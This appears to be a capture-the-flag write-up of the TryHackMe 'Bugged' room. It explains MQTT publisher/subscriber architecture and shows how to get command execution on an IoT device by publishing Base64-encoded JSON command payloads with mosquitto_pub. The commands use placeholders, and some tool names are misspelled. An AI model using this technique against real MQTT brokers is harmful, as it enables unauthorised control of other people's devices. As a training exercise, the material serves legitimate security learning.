We covered working with internet of things devices, went over the MQTT protocol, demonstrated the publisher/subscriber model and performed RCE. This was part of TryHackMe Bugged

John was working on his smart home appliances when he noticed weird traffic going across the network. Can you help him figure out what these weird network communications are?

Understanding the Setup

I explained that John’s smart home appliance is likely communicating with his smartphone or computer. This communication happens over the internet, meaning the appliance is connected to John’s home Wi-Fi and is running a server to send and receive data (metrics like temperature or movement). My goal was to identify the port the smart appliance’s server was running on.

Discovering the Protocol and Architecture

Using an Nmap scan, I found that port 1883 (TCP) was open and running Mosquito version 2014, which uses the MQTT protocol. I described MQTT as a lightweight, machine-to-machine protocol common in IoT devices, designed for resource-constrained networks.

I detailed the MQTT architecture:

  • Publisher: Sends data (e.g., the smart home appliance sending sensor metrics).
  • Subscriber: Receives data (e.g., John’s smartphone or computer).
  • MQTT Broker: A server that facilitates the message exchange between publishers and subscribers. Both publisher and subscriber are considered clients.
  • Topics: The parameters or metrics being monitored (e.g., “lights,” “camera,” “temperature”). Subscribers subscribe to these topics to receive relevant messages.

Investigating the “Weird Traffic”

The “weird traffic” referred to messages and topics exchanged between the appliance (publisher) and John’s device (subscriber) via the MQTT broker. To uncover these messages, I needed to simulate both the publisher and subscriber roles. The MQTT broker software used in this scenario was mosquito_sub.

Using Mosquito Client

I demonstrated how to use the mosquito_sub client program. Key options included:

  • -h or --host: Specifies the MQTT host (the IP address of the smart appliance).
  • -t: Specifies the MQTT topic to subscribe to.

To get a list of all topics, I used the pound character (#) as a wildcard for the topic. Among the listed topics, one appeared to be Base64 encoded. I decoded this Base64 string using CyberChef, revealing a JSON structure with an ID, a “registered_commands” array (help, CMD, sys), a publisher topic (pub_topic), and a subscriber topic (sub_topic).

Simulating Communication and Executing Commands

My next step was to simulate the publisher sending the discovered Base64 topic and the subscriber listening to the corresponding subscriber topic. Initially, I made a mistake by using mosquito_sub for both publishing and subscribing. The correct approach was to use mosquito_pub for publishing.

When I sent a test message, the response was another Base64 string indicating an “invalid message format” and providing the correct format: {"id": "BACK.ID", "CMD": "COMMAND", "ARG": "ARGUMENT"}.

To execute commands, I needed to:

  1. Use the ID from the decoded weird topic.
  2. Set “CMD” to “CMD” (from the allowed registered commands).
  3. Set “ARG” to the system command I wanted to run (e.g., ls).
  4. Encode this entire JSON payload into Base64.
  5. Publish this Base64 encoded message using mosquito_pub with the -m flag for the message, while mosquito_sub was listening to the subscriber topic.

The response to the ls command was another Base64 string, which, when decoded, showed the file listing, including a flag file. I then repeated the process, changing the argument to cat flag.txt to retrieve the flag’s content.

Conclusion

I concluded that this was a good learning experience and a starting point for IoT penetration testing. Understanding the MQTT protocol, the publisher/subscriber architecture, and the role of the broker is crucial. By identifying allowed commands within the topic structure, I was able to execute system commands on the IoT device.

Technical Commands Used on the Terminal

  1. Display help for mosquito_sub:Bashmosquito_sub --help
  2. Subscribe to all topics from the host:Bashmosquito_sub -t "#" -h [IP_ADDRESS]
  3. Publish a test message to the publisher topic (corrected usage with mosquito_pub):Bashmosquito_pub -t "[BASE64_ENCODED_PUB_TOPIC_FROM_DECODED_WEIRD_TRAFFIC]" -h [IP_ADDRESS] -m "test"
  4. Publish the crafted Base64 command payload to the publisher topic:Bashmosquito_pub -t "[BASE64_ENCODED_PUB_TOPIC_FROM_DECODED_WEIRD_TRAFFIC]" -h [IP_ADDRESS] -m "[BASE64_ENCODED_COMMAND_PAYLOAD]" This was done twice:
    • First with the ls command payload.
    • Second with the get flag.txt (conceptually cat flag.txt) command payload.

Video Walkthrough

About the Author

Mastermind Study Notes is a group of talented authors and writers who are experienced and well-versed across different fields. The group is led by, Motasem Hamdan, who is a Cybersecurity content creator and YouTuber.

View Articles